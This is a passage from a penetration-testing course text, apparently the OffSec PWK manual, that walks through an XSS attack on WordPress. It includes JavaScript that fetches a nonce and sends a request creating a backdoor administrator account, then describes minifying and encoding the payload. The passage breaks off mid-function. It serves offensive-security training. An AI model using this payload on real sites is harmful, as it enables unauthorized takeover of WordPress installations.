Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
242
This function performs a new HTTP request towards the /wp-admin/user-new.php
URL and
saves the nonce value found in the HTTP response based on the regular expression. The regex
pattern matches any alphanumeric value contained between the
string
/ser" value="
and double
quotes.
Now that we’ve dynamically retrieved the nonce, we can craft the main function responsible for
creating the new admin user.
var params = "action=createuser&_wpnonce_create-
user="+nonce+"&
user_login=attacker&email=attacker@offsec.com&pass1=attackerpass&pass2=
attackerpass&role=administrator
";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);
Listing 125 - Creating a New WordPress Administrator Account
Highlighted in this function is the
new backdoored admin account, just after the nonce we
obtained previously.
If our attack succeeds, we’ll be able to gain administrative
access to the
entire WordPress installation.
To ensure that our JavaScript payload will be handled correctly by Burp and the target application,
we need to first minify it, then encode it.
To minify our attack code into a one-liner, we can navigate to JS Compress.
379
Figure 116: Minifying the XSS attack code
379
(JSCompress.com, 2022), https://jscompress.com/
Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
243
Once we have clicked on
Compress JavaScript
, we’ll copy the output and save it locally.
As a final attack step, we are going to encode the minified JavaScript code, so any bad characters
won’t interfere with sending the payload. We can do this using the following function:
function encode_to_javascript(string) {
var input = string
var output = '';
for(pos = 0; pos < input.length; pos++) {
Yüklə
Dostları ilə paylaş: